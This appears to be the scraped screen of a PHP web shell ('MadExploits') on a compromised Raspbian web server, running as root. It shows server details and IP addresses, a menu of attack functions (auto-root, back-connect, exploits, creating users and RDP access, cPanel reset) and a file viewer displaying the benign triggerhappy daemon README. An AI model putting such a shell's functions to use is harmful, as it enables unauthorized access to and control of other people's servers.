Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
triggerhappy /
[ HOME SHELL ]
Name
Size
Permission
Action
README
1.82
KB
-rw-r--r--
README.Debian
636
B
-rw-r--r--
changelog.Debian.gz
1.53
KB
-rw-r--r--
copyright
676
B
-rw-r--r--
triggerhappy.conf.examples
810
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
Triggerhappy - a lightweight hotkey daemon - by Stefan Tomanek <stefan.tomanek+th@wertarbyte.de> http://github.com/wertarbyte/triggerhappy/ Triggerhappy is a hotkey daemon developed with small and embedded systems in mind, e.g. linux based routers. It attaches to the input device files and interprets the event data received and executes scripts configured in its configuration. Examples: Dump all events received through two device files: thd --dump /dev/input/event0 /dev/input/event1 Event handlers can be defined in configuration files (specified by --triggers). If a directory is specified, all configuration files within matching the pattern *.conf are loaded. The files use the following format: <event name> <event value> <command line> e.g. KEY_VOLUMEUP 1 /usr/bin/amixer set Master 5%+ KEY_VOLUMEUP 2 /usr/bin/amixer set Master 5%+ KEY_VOLUMEDOWN 1 /usr/bin/amixer set Master 5%- KEY_VOLUMEDOWN 2 /usr/bin/amixer set Master 5%- A value of 1 corresponds to pressing a key, while 2 is generated by holding it; releasing it yields a value of 0. It is also possible to append up to 5 modifiers to each event definition by appending their names to the event name: KEY_VOLUMEUP+KEY_LEFTSHIFT 1 /usr/bin/amixer set Master 15%+ Devices can be added dynamically by specifying a command socket: thd --socket /var/run/triggerhappy.socket --triggers /etc/triggerhappy.d/ The program th-cmd is used to add new devices to the daemon: th-cmd --socket /var/run/triggerhappy.socket --add /dev/input/event0 th-cmd --socket /var/run/triggerhappy.socket --remove /dev/input/event3 An example udev script is also included to facilitate this hotplug support - for this use, th-cmd can handle the parameter "udev" to deduce the device name and action from the udev environment. For more information, consult the manual pages of "thd" and "th-cmd".
Close